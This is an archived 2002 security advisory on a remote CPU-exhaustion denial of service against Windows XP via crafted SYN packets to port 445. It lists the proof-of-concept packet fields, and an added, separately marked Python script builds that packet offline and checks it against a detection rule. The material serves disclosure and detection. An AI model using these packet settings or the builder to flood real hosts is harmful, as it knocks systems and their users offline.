Windows XP Remote DOS attacks with SYN Flag. Make CPU 100 %

From: Adonis.No.Spam (adonis1at_private)
Date: Fri Feb 15 2002 - 08:22:30 PST


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
                               .---------------.
                              / NtWaK0 Advisory \
    +-----------------------------------------------------------------------.
                                                                            :
    Affected         : Windows XP default install with TCP 445 open         :
    Type             : Remote DOS attacks with SYN Flag. Make CPU 100 %     :
    Date             : 15-02-2002                                           :
    Author           : NtWaK0 @ www.SafeHack.com                            :
    +-----------------------------------------------------------------------.
                                                                            :
    +----------------.
     Remote/Local DOS \
    +------------------`----------------------------------------------------.
                                                                            :
    +-----------.                                                           :
     Disclaimer  \                                                          :
    +-------------`---------------------------------------------------------.
    The information in this advisory is believed to be true based on        :
    experiments though it may be false. The opinions expressed in this      :
    advisory and program are my own and NOT of any company.                 :
    In fact I do not work for anyone at the present time.                   :
                                                                            :
    This material is presented for informational and entertainment purposes :
    only, and to satisfy the curious. Any activities described in this file :
    which involve vandalism, theft, or any other illegal activities are     :
    recounted from third-party conversations. I do not condone or encourage :
    vandalism or theft. I do not accept any liability for anything anyone   :
    does with this information. So, don't shoot the messenger.              :
    Remember: Use a computer in ways that ensure respect for your fellows.  :
                                                                            :
    +-------.                                                               :
     T.O.C.  \                                                              :
    +---------`-------------------------------------------------------------.
                                                                            :
                                                                            :
       [  Brief History . . . . . . . . . . . . . . . . . . . . . .line 45 ]:
                                                                            :
       [  The Problem . . . . . . . . . . . . . . . . . . . . . . .line 58 ]:
                                                                            :
       [  The Solution . . . . . . . . . . . . . . . . . . . . . .line 130 ]:
                                                                            :
    +-------------.                                                         :
     Brief History \                                                        :
    +---------------`-------------------------------------------------------.
    TCP/UDP port 445 is open by default on a freshly installed XP box.      :
    The attack is serious since it works remotely and can make the CPU 100 %:
    in less than 20 seconds.                                                :
    To learn more about Windows XP please visit:                            :
    http://www.microsoft.com                                                :
                                                                            :
    YES, YOU HAVE GUESSED IT, ENGLISH IS NOT MY MOTHER LANGUAGE -:)         :
    +---------------------------+                                           :
     >>> Test OS Applications <<<                                           :
    +---------------------------+                                           :
    Tested on Windows XP                                                    :
    Default Install with default ports                                      :
                                                                            :
    +-----------.                                                           :
     The Problem \                                                          :
    +-------------`---------------------------------------------------------.
    If an attacker targets your Windows XP port 445 TCP with some specially :
    crafted packets [SYN flag set] they can cause 100 % CPU utilisation in  :
    less than 20 seconds. The speed while sending the packet was 20 K upload:
    sometimes less than 18 K [based on DU-Meter].                           :
                                                                            :
    I have tried some other default ports with a similar attack but the CPU :
    utilisation was normal, 9 % or 5 %.                                     :
                                                                            :
    The target machine is a Windows XP box with 240 MB of RAM.              :
                                                                            :
    I tried packets with flags other than SYN: nothing happened, CPU was OK :
    When I sent about 3000 packets, NOT IN ONE SHOT... I was sending the    :
    packets one after the other, I noticed CPU utilisation jumped to 100%   :
                                                                            :
    I could not do any TASK on the XP machine till I stopped sending.       :
                                                                            :
    I can see this as a serious problem if you are using Windows XP default.:
                                                                            :
    Imagine someone is attacking your Windows XP from 1000 zombies. I am    :
    not sure if your Windows XP won't crash.                                :
                                                                            :
    Like I said, I sent a couple of packets and the CPU jumped in less than :
    20 sec to 100 %. Soon I am going to do more tests to see what will      :
    happen if I send the same packets for one hour or more.                 :
                                                                            :
                                                                            :
    +-----------------------------------------+                             :
    >>> Proof-Of-Concept-Packet-Information <<<                             :
    +-----------------------------------------+                             :
    [IP]                                                                    :
    SourceAddress=                                                          :
    SourcePort=1                                                            :
    DestinationAddress=                                                     :
    DestinationPort=445                                                     :
    HeaderSize=20                                                           :
    SpecifyHeaderSize=0                                                     :
    Identification=0                                                        :
    SpecifyIdentification=0                                                 :
    Checksum=0                                                              :
    SpecifyChecksum=0                                                       :
    TypeService=4                                                           :
    FragmentationType=2                                                     :
    DataSize=32                                                             :
    Offset=0                                                                :
    TTL=1                                                                   :
                                                                            :
    [Commands]                                                              :
    NbPackets=3000                                                          :
    PacketType=0                                                            :
                                                                            :
    [TCP]                                                                   :
    fURG=0                                                                  :
    fACK=0                                                                  :
    fPUSH=0                                                                 :
    fRESET=0                                                                :
    fSYN=1                                                                  :
    fFIN=0                                                                  :
    Acknowledge=0                                                           :
    Sequence=0                                                              :
    Window=0                                                                :
    Offset=0                                                                :
    Urgent=0                                                                :
    Checksum=0                                                              :
    SpecifyTCPChecksum=0                                                    :
    Data=xffxffxffxffxffxffxffxffxffffx00                                   :
                                                                            :
    ........................................................................:
    ........................................................................:
                                                                            :
    +------------.                                                          :
     The Solution \                                                         :
    +--------------`--------------------------------------------------------.
    Vendor should be informed... I guess Microsoft reads SecurityFocus too. :
    Filter 445 and other UNUSED ports. Stop unused services.                :
    +-----------------------------------------------------------------------.
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.1
    
    iQA/AwUBPG00kPPoW9fFNsN8EQIMcwCg4aNhkGYMIEDs4u+l3MCo5BMZKrcAn17B
    fd1j/WRgYSqj/B4AkiohkXNz
    =jwkR
    -----END PGP SIGNATURE-----
    
    ________________________________________________________________________
    The only secure computer is one that's unplugged, locked in a safe,
    and buried 20 feet under the ground in a secret location... and i'm
    not even too sure about that one"--Dennis Hughes, FBI.
    ____________________________________________________________.___________
    Live Well Do Good  www.SafeHack.com                         |
    Je Pense, Donc Je Suis                                    \(|)/
    I know I ain't perfect, but i'm 99 point 9 percent :)    --(")--
    RFCs are meant to be read and followed…:)                  /`\  NtWaK0
    ________________________________________________________________________
    Connect yourself to the main computer and let me take you to a
    cybernetic ride. Are you connected to the right cybernet? If you are,
    finally you are connected to my brain.
    ________________________________________________________________________
    -=- Use a computer in ways that ensure respect for your fellows      -=-
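Added example, not part of NtWaK0's post or of the tool whose [IP]/[TCP] sections are quoted above: a Python script that assembles the packet the Proof-Of-Concept section describes from those fields, computing the IP and TCP checksums the tool left at 0 (SpecifyChecksum=0), then decodes it back and verifies both checksums the way a sensor would before matching a rule. The addresses are constructed (RFC 5737 documentation range); FragmentationType=2 is read as Don't Fragment, and the Data= bytes are taken as nine 0xff bytes plus 0x00 zero-padded to DataSize=32; both are assumptions. The script builds and inspects packets only; it opens no raw socket and sends nothing.

```python
import socket
import struct

SYN = 0x02  # TCP flag bits live in the low 6 bits of the offset/flags word


def _internet_checksum(data: bytes) -> int:
    """RFC 1071 checksum: 16-bit ones'-complement sum, then complemented.
    Over a header that already carries its correct checksum it returns 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp_packet(src_ip, dst_ip, sport=1, dport=445, flags=SYN, window=0,
                     ttl=1, tos=4, payload=b"\xff" * 9 + b"\x00", data_size=32):
    """Return IPv4 + TCP bytes. The defaults reproduce the advisory's PoC:
    sport 1, dport 445, SYN only, seq/ack/window 0, TOS 4, TTL 1, ID 0,
    DF set (FragmentationType=2 read as Don't Fragment: an assumption), and
    the Data= bytes zero-padded to DataSize=32 (also an assumption)."""
    payload = payload.ljust(data_size, b"\x00")[:data_size]
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    tcp_len = 20 + len(payload)

    def tcp_header(csum):
        # data offset 5 words (20 bytes, no options), flags in the low bits
        return struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags,
                           window, csum, 0)

    # TCP checksum covers pseudo-header (src, dst, zero, proto, TCP length),
    # the TCP header with the checksum field zeroed, and the payload.
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len)
    tcp_csum = _internet_checksum(pseudo + tcp_header(0) + payload)

    def ip_header(csum):
        # version 4 / IHL 5, identification 0, flags=DF (0x4000), offset 0
        return struct.pack("!BBHHHBBH4s4s", 0x45, tos, 20 + tcp_len, 0, 0x4000,
                           ttl, socket.IPPROTO_TCP, csum, src, dst)

    ip_csum = _internet_checksum(ip_header(0))
    return ip_header(ip_csum) + tcp_header(tcp_csum) + payload


def parse_tcp_packet(pkt: bytes) -> dict:
    """Decode IPv4/TCP (IHL honoured, IP options otherwise ignored) and verify
    both checksums, as a sensor would before applying a rule."""
    ihl = (pkt[0] & 0x0F) * 4
    (_, tos, total_len, _, _, ttl, proto, _, src, dst) = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])
    if proto != socket.IPPROTO_TCP:
        raise ValueError("not a TCP packet")
    tcp = pkt[ihl:total_len]
    sport, dport, _, _, off_flags, window, _, _ = struct.unpack("!HHIIHHHH", tcp[:20])
    doff = (off_flags >> 12) * 4
    pseudo = src + dst + struct.pack("!BBH", 0, proto, len(tcp))
    return {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "tos": tos, "ttl": ttl,
        "sport": sport, "dport": dport,
        "flags": off_flags & 0x3F, "window": window,
        "payload_len": len(tcp) - doff,
        # a header whose checksum is correct sums to zero with the field included
        "ip_checksum_ok": _internet_checksum(pkt[:ihl]) == 0,
        "tcp_checksum_ok": _internet_checksum(pseudo + tcp) == 0,
    }


def matches_advisory_syn(p: dict) -> bool:
    """Host/IDS rule for the PoC's signature: a bare SYN to 445 that carries
    payload and advertises a zero window, which no normal client sends."""
    return (p["dport"] == 445 and p["flags"] == SYN
            and p["payload_len"] > 0 and p["window"] == 0)


if __name__ == "__main__":
    # constructed sample addresses from the RFC 5737 documentation range
    pkt = build_tcp_packet("192.0.2.10", "192.0.2.20")
    decoded = parse_tcp_packet(pkt)
    print(len(pkt), "bytes:", decoded)
    print("matches PoC signature:", matches_advisory_syn(decoded))
```

Two points for anyone reading the advisory against this: with TTL=1 the packet is discarded by the first router that would forward it, so the PoC as listed only reaches a target on the sender's own segment; and a SYN that carries 32 bytes of payload and advertises a zero window is unlike anything a real SMB client sends, which is what matches_advisory_syn keys on, and which the suggested filter on 445 makes irrelevant for hosts that do not need to expose it.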
    



    This archive was generated by hypermail 2b30 : Mon Feb 18 2002 - 18:57:07 PST